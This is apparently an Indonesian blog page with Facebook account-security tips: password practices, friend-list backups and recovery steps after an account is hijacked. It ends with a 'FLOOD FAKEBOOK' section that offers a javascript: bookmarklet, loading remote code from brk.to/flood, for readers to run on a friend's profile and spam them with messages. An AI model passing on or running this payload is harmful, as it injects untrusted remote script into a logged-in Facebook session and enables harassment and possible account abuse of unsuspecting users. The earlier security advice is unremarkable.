8. Selalu tambahkan alamat email sekunder pada akun facebook Anda dan juga pada akun email gratisan yang Anda gunakan apabila memang terpaksa tidak ada pilihan selain harus menggunakan layanan tersebut. Sembunyikan atau jangan pernah Anda tunjukkan kepada siapapun dengan alasan apapun alamat email sekunder Anda itu. Dan secara periodik ubahlah semua password Anda sesuai anjuran pengamanan seperti menggunakan kombinasi huruf, angka dan karakter khusus serta panjang password minimal 6 atau 8 karakter yang sulit ditebak orang lain dan bila sulit menghapalnya jangan simpan catatannya di tempat yang mudah diketahui. Atau gunakan fasilitas aplikasi password management untuk membantu Anda. Ada banyak yang gratis.



9. Meskipun tidak lazim, namun demi untuk keamanan, backuplah data friend list Anda. Informasi penting seperti nama profile accountnya, url halaman facebooknya, alamat email dan juga telepon (kalau ada). Sehingga apabila terjadi sesuatu Anda bisa segera memberikan peringatan, misalnya melalui email dan akan berguna apabila kelak Anda membuka akun facebook yang baru dan terpaksa harus memasukkan satu per satu lagi friend list Anda tersebut. Backup memang sedikit merepotkan namun penting.




10. Apabila Anda terlanjur menjadi korban pembajakan akun facebook maka Anda dapat melakukan 4 hal.

1. Pertama, peringatkan semua orang bahwa akun Anda telah dibajak. Upaya ini bisa Anda lakukan lewat berbagai saluran seperti email, telepon, milis, chat, blog dlsb. Demi untuk mencegah orang lain, teman, famili Anda yang ada di friend list menjadi korban misalnya penipuan.

2. Kedua, patut secepatnya (Anda berlomba dengan si pembajak sebelum dia mengganti alamat email utama dan sekunder Anda) mencoba untuk mendapatkan kembali akun Anda melalui prosedur lupa atau kehilangan password. Apabila berhasil, segera ganti alamat email Anda dan passwordnya dan sembunyikan jangan ditampilkan dengan mengubah setting keamanan akun Anda. Jangan buru-buru log out untuk mencegah si pembajak mencoba mengambil alih juga. Dan jangan log out sampai Anda berhasil mengganti alamat email utama dan sekunder Anda serta mengisi password yang baru sekaligus menerapkan setting pengamanan yang lebih tertutup (melindungi/menyembunyikan alamat email Anda).

3. Ketiga, melaporkan kepada tim keamanan facebook bahwa akun Anda telah dibajak, alamatnya adalah:

http://www.facebook.com/help/?page=1023 atau apabila link tersebut telah berubah Anda dapat mencarinya di halaman HELP. Anda akan diminta mengisi form dan selanjutnya akan ada korespondensi dengan tim keamanan facebook yang akan berusaha mengkonfirasi kebenaran laporan Anda dan apabila semua berjalan dengan baik, mungkin akun Anda dapat dikembalikan. Namun pastikan bahwa sebelum melaporkan, Anda sudah memiliki alamat email yang baru dan aman.


4. Yang keempat, apabila semua upaya mengembalikan akun Anda gagal, maka segeralah membuka akun facebook baru, amankan informasinya agar tidak dibajak orang lagi dan add semua teman Anda (semoga Anda melakukan back up). Kemudian bersama-sama ajaklah mereka semuanya untuk melaporkan akun lama Anda yang dibajak tsb. Sebagai akun yang melakukan abuse, fraud, compromise dan impersonating sehingga nanti akan ditutup atau diblokir oleh facebook.
11. Yang terakhir jangan gunakan alamat email, username dan password yang sama untuk semua layanan online yang Anda ikuti. Selalu update pengetahuan Anda mengenai isu keamanan layanan jejaring sosial dan senantiasa waspada ketika aktif di dunia maya.





FLOOD FAKEBOOK
wkwkwk.. ini termasuk script berbahaya kali yah??? COPY file script di bawah ini, lalu buka fakebook teman yang akan kamu kerjain, PASTEkan  URL di profil fakebook teman kamu & ENTER. Lalu akan keluar promp & isikan berapa banyak jumlah yang akan kamu kirim berikiut pesannya. 
javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0);

Read more ...
Designed By